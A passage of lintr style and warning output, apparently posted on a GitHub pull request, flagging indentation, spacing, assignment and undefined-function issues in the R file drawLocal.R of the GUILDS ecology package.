}\n^~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:19:30:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin <- uniroot(f, c(1e-10, xmax))$root\n                            ~^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp = which((x>0)&(x<1));\n^\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n^~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx=x[idxp];\n^\n```\n[R/drawLocal.R:21:20:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                   ^~~\n```\n[R/drawLocal.R:21:23:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tx1 <- (xmax + 1) / 2\n                      ^\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n^\n```\n[R/drawLocal.R:22:9:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n        ^~~~~~~~~\n```\n[R/drawLocal.R:22:20:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                  ~^\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1 + 1)) {\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 <- (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n^~~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n^~\n```\n[R/drawLocal.R:25:10:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:25:28:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 <- pm_sadaux(x1, I, th, j, k)\n                          ~^\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] = aux;\n^\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                     ^~~\n```\n[R/drawLocal.R:31:39:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L31) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\t\txplu <- uniroot(f, c(xmax, x1), tol=eps())$root\n                                      ^~~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                                 ~^~\n```\n[R/drawLocal.R:35:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- min(1, xrgt)\n^~\n```\n[R/drawLocal.R:35:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- min(1, xrgt)\n                    ~^~~\n```\n[R/drawLocal.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:36:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:37:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:37:19:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:38:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n^~\n```\n[R/drawLocal.R:38:20:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L38) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t    return( exp( pm_sadaux(x, I, th, j, k)))\n                   ^~~~~~~~~\n```\n[R/drawLocal.R:39:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:40:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L40) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:41:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n^~\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L41) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                         ^\n```\n[R/drawLocal.R:41:26:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                        ~^~\n```\n[R/drawLocal.R:41:60:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L41) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tres[cnt] = integrate(f, xlft, xrgt, abs.tol=1e-9)$val  #checked!!!!!1\n                                                          ~^~\n```\n[R/drawLocal.R:42:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:44:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n^\n```\n[R/drawLocal.R:44:63:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t#the original algorithm had 1:j, but at the interp1 algorithm \n                                                              ^\n```\n[R/drawLocal.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t# does not evaluate at the ends.\n^\n```\n[R/drawLocal.R:46:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- 1:(j - 1)  \n^\n```\n[R/drawLocal.R:46:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- 1:(j - 1)  \n          ~^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^\n```\n[R/drawLocal.R:46:17:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L46) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tk2 <- 1:(j - 1)  \n                ^~\n```\n[R/drawLocal.R:47:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n^\n```\n[R/drawLocal.R:47:10:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L47) *warning:* **no visible global function definition for ‘interp1’**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n         ^~~~~~~\n```\n[R/drawLocal.R:47:14:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n            ~^~~\n```\n[R/drawLocal.R:47:27:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                         ~^~\n```\n[R/drawLocal.R:47:41:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                        ^~\n```\n[R/drawLocal.R:47:46:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                             ^~\n```\n[R/drawLocal.R:47:56:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                      ~^~\n```\n[R/drawLocal.R:47:75:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- interp1(x = log2(k1), y = k1 * res, xi = log2(k2), method = \"spline\")\n                                                                         ~^~\n```\n[R/drawLocal.R:48:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk2 <- c(k2, j)\n^\n```\n[R/drawLocal.R:48:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​\tk2 <- c(k2, j)\n          ~^~~\n```\n[R/drawLocal.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tkesk <- c(kesk, 0)\n^\n```\n[R/drawLocal.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\tkesk <- c(kesk, 0)\n            ~^~~\n```\n[R/drawLocal.R:50:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk <- kesk / k2\n^\n```\n[R/drawLocal.R:50:13:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk <- kesk / k2\n           ~^\n```\n[R/drawLocal.R:51:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tesk[esk < eps()] <- eps()\n^\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:12:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L51) *warning:* **no visible global function definition for ‘eps’, Did you mean 'esk'?**\n```r\n​\tesk[esk < eps()] <- eps()\n           ^~~\n```\n[R/drawLocal.R:51:17:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n               ~^\n```\n[R/drawLocal.R:51:26:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\tesk[esk < eps()] <- eps()\n                        ~^~~\n```\n[R/drawLocal.R:52:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\treturn(esk)\n^\n```\n[R/drawLocal.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n          ^\n```\n[R/drawLocal.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n         ~^~\n```\n[R/drawLocal.R:56:20:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L56) *warning:* **no visible global function definition for ‘size’, Did you mean 'line'?**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                   ^~~~\n```\n[R/drawLocal.R:56:20:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L56) *warning:* **no visible global function definition for ‘size’, Did you mean 'line'?**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                   ^~~~\n```\n[R/drawLocal.R:56:26:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                        ~^~\n```\n[R/drawLocal.R:56:42:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n                                        ~^~\n```\n[R/drawLocal.R:57:13:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L57) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidx0=which(x==0);\n            ^\n```\n[R/drawLocal.R:57:13:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx0=which(x==0);\n           ~^~\n```\n[R/drawLocal.R:58:11:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L58) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(idx0)) {\n          ^\n```\n[R/drawLocal.R:59:21:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L59) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                    ^\n```\n[R/drawLocal.R:59:21:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                   ~^~\n```\n[R/drawLocal.R:59:31:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L59) *style:* **Put spaces around all infix operators.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n                              ^~\n```\n[R/drawLocal.R:60:35:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                 